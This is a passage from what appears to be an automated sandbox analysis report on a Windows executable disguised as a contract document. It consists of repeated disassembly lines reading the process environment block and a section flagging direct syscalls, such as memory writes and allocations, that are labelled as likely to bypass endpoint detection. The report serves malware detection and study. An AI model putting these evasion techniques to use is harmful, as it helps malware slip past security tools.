                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173C720 mov eax, dword ptr fs:[00000030h]2_2_0173C720
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01700710 mov eax, dword ptr fs:[00000030h]2_2_01700710
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01730710 mov eax, dword ptr fs:[00000030h]2_2_01730710
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173C700 mov eax, dword ptr fs:[00000030h]2_2_0173C700
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017047FB mov eax, dword ptr fs:[00000030h]2_2_017047FB
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017047FB mov eax, dword ptr fs:[00000030h]2_2_017047FB
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0178E7E1 mov eax, dword ptr fs:[00000030h]2_2_0178E7E1
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017227ED mov eax, dword ptr fs:[00000030h]2_2_017227ED
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017227ED mov eax, dword ptr fs:[00000030h]2_2_017227ED
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017227ED mov eax, dword ptr fs:[00000030h]2_2_017227ED
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0170C7C0 mov eax, dword ptr fs:[00000030h]2_2_0170C7C0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017807C3 mov eax, dword ptr fs:[00000030h]2_2_017807C3
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017B47A0 mov eax, dword ptr fs:[00000030h]2_2_017B47A0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017007AF mov eax, dword ptr fs:[00000030h]2_2_017007AF
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017A678E mov eax, dword ptr fs:[00000030h]2_2_017A678E
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01732674 mov eax, dword ptr fs:[00000030h]2_2_01732674
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017C866E mov eax, dword ptr fs:[00000030h]2_2_017C866E
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017C866E mov eax, dword ptr fs:[00000030h]2_2_017C866E
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173A660 mov eax, dword ptr fs:[00000030h]2_2_0173A660
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173A660 mov eax, dword ptr fs:[00000030h]2_2_0173A660
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0171C640 mov eax, dword ptr fs:[00000030h]2_2_0171C640
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01736620 mov eax, dword ptr fs:[00000030h]2_2_01736620
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01738620 mov eax, dword ptr fs:[00000030h]2_2_01738620
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0171E627 mov eax, dword ptr fs:[00000030h]2_2_0171E627
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0170262C mov eax, dword ptr fs:[00000030h]2_2_0170262C
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01742619 mov eax, dword ptr fs:[00000030h]2_2_01742619
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0171260B mov eax, dword ptr fs:[00000030h]2_2_0171260B
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0171260B mov eax, dword ptr fs:[00000030h]2_2_0171260B
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0171260B mov eax, dword ptr fs:[00000030h]2_2_0171260B
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0171260B mov eax, dword ptr fs:[00000030h]2_2_0171260B
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0171260B mov eax, dword ptr fs:[00000030h]2_2_0171260B
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0171260B mov eax, dword ptr fs:[00000030h]2_2_0171260B
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0171260B mov eax, dword ptr fs:[00000030h]2_2_0171260B
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0177E609 mov eax, dword ptr fs:[00000030h]2_2_0177E609
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0177E6F2 mov eax, dword ptr fs:[00000030h]2_2_0177E6F2
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0177E6F2 mov eax, dword ptr fs:[00000030h]2_2_0177E6F2
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0177E6F2 mov eax, dword ptr fs:[00000030h]2_2_0177E6F2
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0177E6F2 mov eax, dword ptr fs:[00000030h]2_2_0177E6F2
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017806F1 mov eax, dword ptr fs:[00000030h]2_2_017806F1
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017806F1 mov eax, dword ptr fs:[00000030h]2_2_017806F1
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0173A6C7
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173A6C7 mov eax, dword ptr fs:[00000030h]2_2_0173A6C7
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017366B0 mov eax, dword ptr fs:[00000030h]2_2_017366B0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173C6A6 mov eax, dword ptr fs:[00000030h]2_2_0173C6A6
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01704690 mov eax, dword ptr fs:[00000030h]2_2_01704690
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01704690 mov eax, dword ptr fs:[00000030h]2_2_01704690
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017A4978 mov eax, dword ptr fs:[00000030h]2_2_017A4978
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017A4978 mov eax, dword ptr fs:[00000030h]2_2_017A4978
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0178C97C mov eax, dword ptr fs:[00000030h]2_2_0178C97C
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01726962 mov eax, dword ptr fs:[00000030h]2_2_01726962
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01726962 mov eax, dword ptr fs:[00000030h]2_2_01726962
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01726962 mov eax, dword ptr fs:[00000030h]2_2_01726962
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0174096E mov eax, dword ptr fs:[00000030h]2_2_0174096E
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0174096E mov edx, dword ptr fs:[00000030h]2_2_0174096E
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0174096E mov eax, dword ptr fs:[00000030h]2_2_0174096E
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017D4940 mov eax, dword ptr fs:[00000030h]2_2_017D4940
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01780946 mov eax, dword ptr fs:[00000030h]2_2_01780946
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0178892A mov eax, dword ptr fs:[00000030h]2_2_0178892A
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0179892B mov eax, dword ptr fs:[00000030h]2_2_0179892B
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0178C912 mov eax, dword ptr fs:[00000030h]2_2_0178C912
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_016F8918 mov eax, dword ptr fs:[00000030h]2_2_016F8918
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_016F8918 mov eax, dword ptr fs:[00000030h]2_2_016F8918
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0177E908 mov eax, dword ptr fs:[00000030h]2_2_0177E908
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0177E908 mov eax, dword ptr fs:[00000030h]2_2_0177E908
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017329F9 mov eax, dword ptr fs:[00000030h]2_2_017329F9
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017329F9 mov eax, dword ptr fs:[00000030h]2_2_017329F9
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0178E9E0 mov eax, dword ptr fs:[00000030h]2_2_0178E9E0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0170A9D0 mov eax, dword ptr fs:[00000030h]2_2_0170A9D0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0170A9D0 mov eax, dword ptr fs:[00000030h]2_2_0170A9D0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0170A9D0 mov eax, dword ptr fs:[00000030h]2_2_0170A9D0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0170A9D0 mov eax, dword ptr fs:[00000030h]2_2_0170A9D0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0170A9D0 mov eax, dword ptr fs:[00000030h]2_2_0170A9D0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0170A9D0 mov eax, dword ptr fs:[00000030h]2_2_0170A9D0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017349D0 mov eax, dword ptr fs:[00000030h]2_2_017349D0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017CA9D3 mov eax, dword ptr fs:[00000030h]2_2_017CA9D3
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017969C0 mov eax, dword ptr fs:[00000030h]2_2_017969C0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017889B3 mov esi, dword ptr fs:[00000030h]2_2_017889B3
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017889B3 mov eax, dword ptr fs:[00000030h]2_2_017889B3
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017889B3 mov eax, dword ptr fs:[00000030h]2_2_017889B3
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017129A0 mov eax, dword ptr fs:[00000030h]2_2_017129A0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017129A0 mov eax, dword ptr fs:[00000030h]2_2_017129A0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017129A0 mov eax, dword ptr fs:[00000030h]2_2_017129A0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017129A0 mov eax, dword ptr fs:[00000030h]2_2_017129A0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017129A0 mov eax, dword ptr fs:[00000030h]2_2_017129A0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017129A0 mov eax, dword ptr fs:[00000030h]2_2_017129A0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017129A0 mov eax, dword ptr fs:[00000030h]2_2_017129A0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017129A0 mov eax, dword ptr fs:[00000030h]2_2_017129A0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017129A0 mov eax, dword ptr fs:[00000030h]2_2_017129A0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017129A0 mov eax, dword ptr fs:[00000030h]2_2_017129A0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017129A0 mov eax, dword ptr fs:[00000030h]2_2_017129A0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017129A0 mov eax, dword ptr fs:[00000030h]2_2_017129A0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017129A0 mov eax, dword ptr fs:[00000030h]2_2_017129A0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017009AD mov eax, dword ptr fs:[00000030h]2_2_017009AD
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017009AD mov eax, dword ptr fs:[00000030h]2_2_017009AD
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01796870 mov eax, dword ptr fs:[00000030h]2_2_01796870
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01796870 mov eax, dword ptr fs:[00000030h]2_2_01796870
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0178E872 mov eax, dword ptr fs:[00000030h]2_2_0178E872
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0178E872 mov eax, dword ptr fs:[00000030h]2_2_0178E872
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01730854 mov eax, dword ptr fs:[00000030h]2_2_01730854
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01704859 mov eax, dword ptr fs:[00000030h]2_2_01704859
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01704859 mov eax, dword ptr fs:[00000030h]2_2_01704859
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01712840 mov ecx, dword ptr fs:[00000030h]2_2_01712840
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017A483A mov eax, dword ptr fs:[00000030h]2_2_017A483A
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017A483A mov eax, dword ptr fs:[00000030h]2_2_017A483A
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173A830 mov eax, dword ptr fs:[00000030h]2_2_0173A830
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01722835 mov eax, dword ptr fs:[00000030h]2_2_01722835
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01722835 mov eax, dword ptr fs:[00000030h]2_2_01722835
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01722835 mov eax, dword ptr fs:[00000030h]2_2_01722835
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01722835 mov ecx, dword ptr fs:[00000030h]2_2_01722835
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01722835 mov eax, dword ptr fs:[00000030h]2_2_01722835
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01722835 mov eax, dword ptr fs:[00000030h]2_2_01722835
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0178C810 mov eax, dword ptr fs:[00000030h]2_2_0178C810
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173C8F9 mov eax, dword ptr fs:[00000030h]2_2_0173C8F9
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173C8F9 mov eax, dword ptr fs:[00000030h]2_2_0173C8F9
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017CA8E4 mov eax, dword ptr fs:[00000030h]2_2_017CA8E4
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0172E8C0 mov eax, dword ptr fs:[00000030h]2_2_0172E8C0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017D08C0 mov eax, dword ptr fs:[00000030h]2_2_017D08C0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0178C89D mov eax, dword ptr fs:[00000030h]2_2_0178C89D
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01700887 mov eax, dword ptr fs:[00000030h]2_2_01700887
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_016FCB7E mov eax, dword ptr fs:[00000030h]2_2_016FCB7E
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017AEB50 mov eax, dword ptr fs:[00000030h]2_2_017AEB50
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017D2B57 mov eax, dword ptr fs:[00000030h]2_2_017D2B57
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017D2B57 mov eax, dword ptr fs:[00000030h]2_2_017D2B57
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017D2B57 mov eax, dword ptr fs:[00000030h]2_2_017D2B57
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017D2B57 mov eax, dword ptr fs:[00000030h]2_2_017D2B57
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017B4B4B mov eax, dword ptr fs:[00000030h]2_2_017B4B4B
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017B4B4B mov eax, dword ptr fs:[00000030h]2_2_017B4B4B
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017A8B42 mov eax, dword ptr fs:[00000030h]2_2_017A8B42
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01796B40 mov eax, dword ptr fs:[00000030h]2_2_01796B40
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01796B40 mov eax, dword ptr fs:[00000030h]2_2_01796B40
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017CAB40 mov eax, dword ptr fs:[00000030h]2_2_017CAB40
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_016F8B50 mov eax, dword ptr fs:[00000030h]2_2_016F8B50
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0172EB20 mov eax, dword ptr fs:[00000030h]2_2_0172EB20
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0172EB20 mov eax, dword ptr fs:[00000030h]2_2_0172EB20
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017C8B28 mov eax, dword ptr fs:[00000030h]2_2_017C8B28
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017C8B28 mov eax, dword ptr fs:[00000030h]2_2_017C8B28
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0177EB1D mov eax, dword ptr fs:[00000030h]2_2_0177EB1D
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0177EB1D mov eax, dword ptr fs:[00000030h]2_2_0177EB1D
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0177EB1D mov eax, dword ptr fs:[00000030h]2_2_0177EB1D
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0177EB1D mov eax, dword ptr fs:[00000030h]2_2_0177EB1D
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0177EB1D mov eax, dword ptr fs:[00000030h]2_2_0177EB1D
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0177EB1D mov eax, dword ptr fs:[00000030h]2_2_0177EB1D
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0177EB1D mov eax, dword ptr fs:[00000030h]2_2_0177EB1D
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0177EB1D mov eax, dword ptr fs:[00000030h]2_2_0177EB1D
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0177EB1D mov eax, dword ptr fs:[00000030h]2_2_0177EB1D
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017D4B00 mov eax, dword ptr fs:[00000030h]2_2_017D4B00
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01708BF0 mov eax, dword ptr fs:[00000030h]2_2_01708BF0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01708BF0 mov eax, dword ptr fs:[00000030h]2_2_01708BF0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01708BF0 mov eax, dword ptr fs:[00000030h]2_2_01708BF0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0178CBF0 mov eax, dword ptr fs:[00000030h]2_2_0178CBF0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0172EBFC mov eax, dword ptr fs:[00000030h]2_2_0172EBFC
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017AEBD0 mov eax, dword ptr fs:[00000030h]2_2_017AEBD0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01720BCB mov eax, dword ptr fs:[00000030h]2_2_01720BCB
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01720BCB mov eax, dword ptr fs:[00000030h]2_2_01720BCB
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01720BCB mov eax, dword ptr fs:[00000030h]2_2_01720BCB
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01700BCD mov eax, dword ptr fs:[00000030h]2_2_01700BCD
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01700BCD mov eax, dword ptr fs:[00000030h]2_2_01700BCD
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01700BCD mov eax, dword ptr fs:[00000030h]2_2_01700BCD
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017B4BB0 mov eax, dword ptr fs:[00000030h]2_2_017B4BB0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017B4BB0 mov eax, dword ptr fs:[00000030h]2_2_017B4BB0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01710BBE mov eax, dword ptr fs:[00000030h]2_2_01710BBE
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01710BBE mov eax, dword ptr fs:[00000030h]2_2_01710BBE
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0177CA72 mov eax, dword ptr fs:[00000030h]2_2_0177CA72
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0177CA72 mov eax, dword ptr fs:[00000030h]2_2_0177CA72
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_017AEA60 mov eax, dword ptr fs:[00000030h]2_2_017AEA60
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173CA6F mov eax, dword ptr fs:[00000030h]2_2_0173CA6F
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173CA6F mov eax, dword ptr fs:[00000030h]2_2_0173CA6F
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173CA6F mov eax, dword ptr fs:[00000030h]2_2_0173CA6F
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01706A50 mov eax, dword ptr fs:[00000030h]2_2_01706A50
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01706A50 mov eax, dword ptr fs:[00000030h]2_2_01706A50
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01706A50 mov eax, dword ptr fs:[00000030h]2_2_01706A50
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01706A50 mov eax, dword ptr fs:[00000030h]2_2_01706A50
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01706A50 mov eax, dword ptr fs:[00000030h]2_2_01706A50
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01706A50 mov eax, dword ptr fs:[00000030h]2_2_01706A50
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01706A50 mov eax, dword ptr fs:[00000030h]2_2_01706A50
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01710A5B mov eax, dword ptr fs:[00000030h]2_2_01710A5B
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01710A5B mov eax, dword ptr fs:[00000030h]2_2_01710A5B
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01724A35 mov eax, dword ptr fs:[00000030h]2_2_01724A35
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01724A35 mov eax, dword ptr fs:[00000030h]2_2_01724A35
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173CA24 mov eax, dword ptr fs:[00000030h]2_2_0173CA24
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0172EA2E mov eax, dword ptr fs:[00000030h]2_2_0172EA2E
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0178CA11 mov eax, dword ptr fs:[00000030h]2_2_0178CA11
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173AAEE mov eax, dword ptr fs:[00000030h]2_2_0173AAEE
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0173AAEE mov eax, dword ptr fs:[00000030h]2_2_0173AAEE
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01700AD0 mov eax, dword ptr fs:[00000030h]2_2_01700AD0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01734AD0 mov eax, dword ptr fs:[00000030h]2_2_01734AD0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01734AD0 mov eax, dword ptr fs:[00000030h]2_2_01734AD0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01756ACC mov eax, dword ptr fs:[00000030h]2_2_01756ACC
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01756ACC mov eax, dword ptr fs:[00000030h]2_2_01756ACC
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01756ACC mov eax, dword ptr fs:[00000030h]2_2_01756ACC
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01708AA0 mov eax, dword ptr fs:[00000030h]2_2_01708AA0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01708AA0 mov eax, dword ptr fs:[00000030h]2_2_01708AA0
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01756AA4 mov eax, dword ptr fs:[00000030h]2_2_01756AA4
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_01738A90 mov edx, dword ptr fs:[00000030h]2_2_01738A90
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeCode function: 2_2_0170EA80 mov eax, dword ptr fs:[00000030h]2_2_0170EA80
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeNtClose: Direct from: 0x76F02B6C
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
